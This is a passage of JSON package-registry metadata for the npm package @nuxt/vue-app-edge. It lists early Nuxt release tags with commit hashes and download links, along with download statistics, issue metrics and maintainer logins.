b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:57.164Z","dependent_packages_count":4,"downloads":24014,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.0664813815465446,"dependent_repos_count":0.8459715122247295,"dependent_packages_count":4.421787968848049,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":1.4441245535961738},"purl":"pkg:npm/%40nuxt/vue-app-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/vue-app-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vue-app-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vue-app-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-10T18:10:26.152Z","updated_at":"2026-02-10T18:10:26.152Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T16:29:03.774Z","updated_at":"2023-12-13T16:29:03.774Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","names